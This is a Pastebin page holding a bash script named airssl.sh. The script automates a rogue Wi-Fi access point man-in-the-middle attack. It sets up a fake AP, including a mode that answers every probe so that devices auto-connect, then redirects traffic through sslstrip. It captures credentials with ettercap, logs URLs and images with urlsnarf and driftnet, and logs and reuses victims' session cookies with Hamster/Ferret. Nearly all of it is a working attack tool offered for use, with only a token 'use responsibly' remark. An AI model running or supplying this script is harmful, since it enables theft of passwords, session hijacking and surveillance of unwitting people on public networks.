This week only. Pastebin PRO Accounts Christmas Special! Don't miss out!Want more features on Pastebin? Sign Up, it's FREE!
Guest

Untitled

By: a guest on Feb 20th, 2011  |  syntax: Bash  |  size: 7.81 KB  |  views: 201  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. #!/bin/bash
  2. # (C)opyright 2009 - killadaninja - Modified G60Jon 2010 - Modified again by EODtech on backtrack-linux.org
  3. # airssl.sh - v1.0
  4. # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
  5.  
  6. # Network questions
  7. echo
  8. echo "AIRSSL 2.0 - Credits killadaninja & G60Jon  "
  9. echo
  10. route -n -A inet | grep UG
  11. echo
  12. echo
  13. echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
  14. read -e gatewayip
  15. echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
  16. read -e internet_interface
  17. echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
  18. read -e fakeap_interface
  19. echo -n "Enter the ESSID you would like your rogue AP to be called: "
  20. read -e ESSID
  21. airmon-ng start $fakeap_interface
  22. fakeap=$fakeap_interface
  23. fakeap_interface="mon0"
  24.  
  25. # Dhcpd creation
  26. mkdir -p "/pentest/wireless/airssl"
  27. echo "authoritative;
  28.  
  29. default-lease-time 600;
  30. max-lease-time 7200;
  31.  
  32. subnet 10.0.0.0 netmask 255.255.255.0 {
  33. option routers 10.0.0.1;
  34. option subnet-mask 255.255.255.0;
  35.  
  36. option domain-name "\"$ESSID\"";
  37. option domain-name-servers 10.0.0.1;
  38.  
  39. range 10.0.0.20 10.0.0.50;
  40.  
  41. }" > /pentest/wireless/airssl/dhcpd.conf
  42.  
  43. # Fake ap setup
  44. echo "[+] Configuring FakeAP...."
  45. echo
  46. echo "Airbase-ng will run in its most basic mode, would you like to
  47. configure any extra switches? "
  48. echo
  49. echo "Choose Y to see airbase-ng help and add switches. "
  50. echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
  51. echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
  52. echo "Y, N or A "
  53.  
  54.  
  55. read ANSWER
  56.  
  57. if [ $ANSWER = "y" ] ; then
  58. airbase-ng --help
  59. fi
  60.  
  61. if [ $ANSWER = "y" ] ; then
  62. echo
  63. echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
  64. redefined, also in this mode you MUST define a channel "
  65. read -e aswitch
  66. echo
  67. echo "[+] Starting FakeAP..."
  68. xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
  69. sleep 2
  70. fi
  71.  
  72. if [ $ANSWER = "a" ] ; then
  73. echo
  74. echo "[+] Starting FakeAP..."
  75. xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
  76. sleep 2
  77. fi
  78.  
  79.  
  80. if [ $ANSWER = "n" ] ; then
  81. echo
  82. echo "[+] Starting FakeAP..."
  83. xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
  84. sleep 2
  85. fi
  86.  
  87. # Tables
  88. echo "[+] Configuring forwarding tables..."
  89. ifconfig lo up
  90. ifconfig at0 up &
  91. sleep 1
  92. ifconfig at0 10.0.0.1 netmask 255.255.255.0
  93. ifconfig at0 mtu 1400
  94. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  95. iptables --flush
  96. iptables --table nat --flush
  97. iptables --delete-chain
  98. iptables --table nat --delete-chain
  99. echo 1 > /proc/sys/net/ipv4/ip_forward
  100. iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
  101. iptables -P FORWARD ACCEPT
  102. iptables --append FORWARD --in-interface at0 -j ACCEPT
  103. iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
  104. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  105.  
  106. # DHCP
  107. echo "[+] Setting up DHCP..."
  108. touch /var/run/dhcpd.pid
  109. chown dhcpd:dhcpd /var/run/dhcpd.pid
  110. xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
  111. sleep 3
  112.  
  113. # Sslstrip
  114. echo "[+] Starting sslstrip..."
  115. xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k & sslstripid=$!
  116. sleep 2
  117.  
  118. # Ettercap
  119. echo "[+] Configuring ettercap..."
  120. echo
  121. echo "Ettercap will run in its most basic mode, would you like to
  122. configure any extra switches for example to load plugins or filters,
  123. (advanced users only), if you are unsure choose N "
  124. echo "Y or N "
  125. read ETTER
  126. if [ $ETTER = "y" ] ; then
  127. ettercap --help
  128. fi
  129.  
  130. if [ $ETTER = "y" ] ; then
  131. echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
  132. For the sake of airssl, ettercap WILL USE -u and -p so you are advised
  133. NOT to use -M, also -i is already set and CANNOT be redifined here.
  134. Ettercaps output will be saved to /pentest/wireless/airssl/passwords
  135. DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
  136. echo
  137. read "eswitch"
  138. echo "[+] Starting ettercap..."
  139. xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
  140. sleep 1
  141. fi
  142.  
  143. if [ $ETTER = "n" ] ; then
  144. echo
  145. echo "[+] Starting ettercap..."
  146. xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
  147. sleep 1
  148. fi
  149.  
  150. # URLSnarf
  151. echo
  152. echo "[+] URLSnarf?"
  153. echo
  154. echo "Would you also like to start URL Snarf to see what webpages are being pulled up or something?"
  155. echo "Y or N"
  156. read URLSN
  157. if [ $URLSN = "y" ] ; then
  158. echo
  159. echo "[+] Starting URLSnarf..."
  160. xterm -geometry 75x20+1+500 -T URLSnarf -bg white -fg black -e urlsnarf -i at0 & urlsnid=$!
  161. sleep 3
  162. fi
  163.  
  164. #Impliment Ferret / Hamster for cookies!!!
  165. echo
  166. echo "[+] Hamster / Ferret?"
  167. echo
  168. echo "Would you like to start Hamster / Ferret to log (AND USE!) the vicim's cookies?"
  169. echo
  170. echo "BE SURE TO HAVE YOUR INTERNET COOKIES CLEARED, AND A PROXY MANUALLY SET TO 127.0.0.2 PORT 1233"
  171. echo
  172. echo "Then just visit http://hamster and set interface to eth0 or what ever you supplied for your internet facing connection :)"
  173. echo
  174. echo "NOTE:  Cookies will be logged, however they will all show up under your local IP address"
  175. echo "Y or N"
  176. read HAMSTER
  177. if [ $HAMSTER = "y" ] ; then
  178. echo
  179. echo "[+] Starting Hamster / Ferret..."
  180. xterm -geometry 75x10+500+0 -T Ferret -bg white -fb black -e /root/moddedhamster/ferret -i $internet_interface & ferretid=$!
  181. sleep 1
  182. xterm -geometry 75x10+500+100 -T Hamster -bg white -fb black -e /root/moddedhamster/hamster & hamsterid=$!
  183. sleep 3
  184. fi
  185.  
  186. # Driftnet
  187. echo
  188. echo "[+] Driftnet?"
  189. echo
  190. echo "Would you also like to start driftnet to capture the victims images,
  191. (this may make the network a little slower), "
  192. echo "Y or N "
  193. read DRIFT
  194.  
  195. if [ $DRIFT = "y" ] ; then
  196. mkdir -p "/pentest/wireless/airssl/driftnetdata"
  197. echo "[+] Starting driftnet..."
  198. driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
  199. sleep 3
  200. fi
  201.  
  202. xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
  203.  
  204. clear
  205. echo
  206. echo "[+] Activated..."
  207. echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
  208. echo
  209. echo "[+] IMPORTANT..."
  210. echo "After you have finished please close airssl and clean up properly by hitting Y,
  211. if airssl is not closed properly ERRORS WILL OCCUR "
  212. read WISH
  213.  
  214. # Clean up
  215. if [ $WISH = "y" ] ; then
  216. echo
  217. echo "[+] Cleaning up airssl and resetting iptables..."
  218.  
  219. kill ${fakeapid}
  220. kill ${dchpid}
  221. kill ${sslstripid}
  222. kill ${ettercapid}
  223. kill ${dritnetid}
  224. kill ${sslstriplogid}
  225. kill ${urlsnid}
  226. kill ${ferretid}
  227. kill ${hamsterid}
  228.  
  229. airmon-ng stop $fakeap_interface
  230. airmon-ng stop $fakeap
  231. echo "0" > /proc/sys/net/ipv4/ip_forward
  232. iptables --flush
  233. iptables --table nat --flush
  234. iptables --delete-chain
  235. iptables --table nat --delete-chain
  236.  
  237. echo "[+] Clean up successful..."
  238. echo "[+] Thank you for using airssl, Good Bye..."
  239. exit
  240.  
  241. fi
  242. exit
clone this paste RAW Paste Data